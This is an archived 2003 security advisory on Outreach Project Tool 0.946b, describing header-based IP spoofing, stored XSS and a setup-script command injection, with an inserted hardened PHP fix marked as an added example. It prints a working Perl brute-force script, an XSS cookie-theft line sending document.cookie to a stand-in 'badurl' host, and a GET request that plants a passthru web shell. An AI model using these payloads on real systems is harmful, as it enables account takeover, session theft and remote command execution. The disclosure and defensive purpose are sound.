20th Jan 2003 [SBWID-5935]
COMMAND
	Outreach Project Tool issues
SYSTEMS AFFECTED
	O.P.T Version opt_0.946b / Earlier versions may be vulnerable too
PROBLEM
	In an advisory by Martin Eiszner [[email protected]] of WebSec.org
	[http://www.websec.org]:
	The Outreach Project Tool was developed by CSO Lanifex GmbH to support
	communication with customers during project implementation. It has
	rapidly evolved into a highly effective Web-based collaboration system,
	which improves interaction between consultants and their clients, as
	well as a wide range of other applications.
	--snip--
	
	 1) REQUEST-HEADER TARPIT - OUT-CHEAT
	
	The function "OPT_remote_IP()" (/opt/general.php) accepts the
	"X_FORWARDED_FOR" and "VIA" environment variables.
	This is done to identify possible proxy-servers. Unfortunately these
	variables are part of the HTTP-request headers.
	The following HTTP request:
	
	---*---
	GET /opt/whatever HTTP/1.1
	Host: whatever
	VIA: 1.2.3.4
	---*---
	
	"$HTTP_VIA" will be used as the user's IP.
	Thus leading to:
	 -Anonymous use of the application
	 -Possibility of a brute-force attack against accounts
	Simple example for a brute-force attack against OPT:
	
	---cut here---
	#!/usr/bin/perl
	use LWP::UserAgent;
	use HTTP::Request::Common;
	use HTTP::Response;
	my ($url,$uid,$pf) = @ARGV;
	open(P,"< $pf") || die "passf.?\n";
	my $ua = LWP::UserAgent->new(requests_redirectable => ['POST']); # carefully !
	while(<P>){ my $pwd = $_; chomp($pwd);
	my %h = ( VIA => (rand(255)%255).".".(rand(255)%255).".".(rand(255)%255).".".(rand(255)%255) );
	my $res = $ua->request(HEAD "$url?lang=0&justlogged=1&username=$uid&password=$pwd&tz=+0200&button=Login now",%h);
	my $hds = $res->headers; my $new = $hds->header("Location");
	my $res2 = $ua->request(GET "$new",%h); my $res2 = $ua->request(GET "$new",%h); # strange db-redirect stuff ?!!
	my $cod = $res2->code;
	my $pag = $res2->content;
	print "$uid:$pwd ".(($cod =~ /20\d/ && $pag !~ /is invalid/ig)?"\tYES":'')."\n"; }
	close (P);
	---cut here---
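	The defensive counterpart to the header tarpit above, as an added example that is not part of the original advisory or of OPT's code: the socket peer (REMOTE_ADDR) is always used, and a forwarding header is consulted only when that peer is one of a configured set of trusted proxies. The $trusted_proxies list and the sample requests are constructed for the example.

```php
<?php
// Added example, not OPT's own OPT_remote_IP(). Derive the client address without
// trusting headers the client can set. Only when the TCP peer is a known proxy is
// the X-Forwarded-For chain consulted, and then only the hop adjacent to that proxy.
// $trusted_proxies is an assumed deployment setting; all addresses are constructed.

function opt_remote_ip_hardened(array $server, array $trusted_proxies): string
{
    $peer = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($peer, FILTER_VALIDATE_IP) === false) {
        return '';
    }
    // Not behind a proxy we trust: REMOTE_ADDR is the socket peer, which the
    // client cannot forge the way it forges a Via or X-Forwarded-For header.
    if (!in_array($peer, $trusted_proxies, true)) {
        return $peer;
    }
    $xff = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    if ($xff === '') {
        return $peer;
    }
    // Walk the chain from the right: skip our own proxies, take the first other hop.
    $hops = array_map('trim', explode(',', $xff));
    for ($i = count($hops) - 1; $i >= 0; $i--) {
        if (in_array($hops[$i], $trusted_proxies, true)) {
            continue;
        }
        if (filter_var($hops[$i], FILTER_VALIDATE_IP) !== false) {
            return $hops[$i];
        }
        break; // malformed hop: fall back to the proxy address rather than trust it
    }
    return $peer;
}

// Constructed sample requests. A client connecting directly and sending a forged
// Via / X-Forwarded-For header is still identified by its real peer address; a
// request relayed by the trusted proxy is attributed to the hop the proxy saw.
$trusted = ['10.0.0.5'];
$direct  = ['REMOTE_ADDR' => '203.0.113.7', 'HTTP_VIA' => '1.2.3.4',
            'HTTP_X_FORWARDED_FOR' => '1.2.3.4'];
$proxied = ['REMOTE_ADDR' => '10.0.0.5',
            'HTTP_X_FORWARDED_FOR' => '198.51.100.9, 10.0.0.5'];
echo opt_remote_ip_hardened($direct, $trusted), "\n";
echo opt_remote_ip_hardened($proxied, $trusted), "\n";
```

	With this logic a brute-force attempt that randomises the Via header per request still arrives from one REMOTE_ADDR, so per-address lockout and logging remain meaningful.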
	
	
	 2) SEVERAL XSS VULNERABILITIES Help/Forums/and Others
	
	Typical XSS vulnerabilities exist in many/most of the
	community-functions.
	Example:
	Once logged in ... go to "Notes -> News -> Ad News", then create a News
	with scripting tags included:
	
	---cut here---
	hello i am a news thing .. bla bla ...
	<script> alert(document.cookie); </script>
	---cut here---
	
	Now every user gets an alert window with his own session-id (only
	as an example!!).
	Of course it is possible to steal the OPT_Session by requesting another
	URL where a so-called cookie-theft is installed !!
	
	(location.href or window.open("http://badurl/theft?"+document.cookie,"a") ...)
	
	This vulnerability makes it possible, once logged in, to steal "any"
	other users' accounts (administrator included !).
	
	 3) SETUP-ISSUES (/opt/setup)
	
	If the lockfile "lock01" in the setup_lock-directory is not removed due
	to wrong permission settings, or someone is able/allowed to create a
	file "lock01", it is possible to:
	
	a) Create a new Setup
	b) Execute system-commands through the setup.php script.
	
	This is because the "temp_CRM_dir" parameter is passed directly to the
	PHP exec function.
	Example GET-Request:
	
	---cut here---
	http://localhost/opt/setup/setup.php?
	CRM_email=opti@localhost
	&CRM_system_email=mei@localhost
	&CRM_path=/disk2/apps/opt/OPT_0.946b/opt
	&CRM_db_host=localhost&CRM_db_uname=opt
	&CRM_db_pwd=opt
	&CRM_db_db=opt
	&CRM_may_demo=0
	&temp_CRM_dir=a;echo+-e+%5c074?passthru%5c050%5c044c%5c051?%5c076+%3E+bad.php;
	&CRM_mail_fname=OPT_incoming_mail
	&action=Set up my OPT server
	---cut here---
	
	The above will create a script called "bad.php" with the
	content (<?passthru($c)?>) in the OPT-setup directory !
SOLUTION
	After installation check if the file "lock01" exists in the
	setup_lock-directory. If yes, remove it.
	The other vulnerabilities can only be fixed by software patches. (?)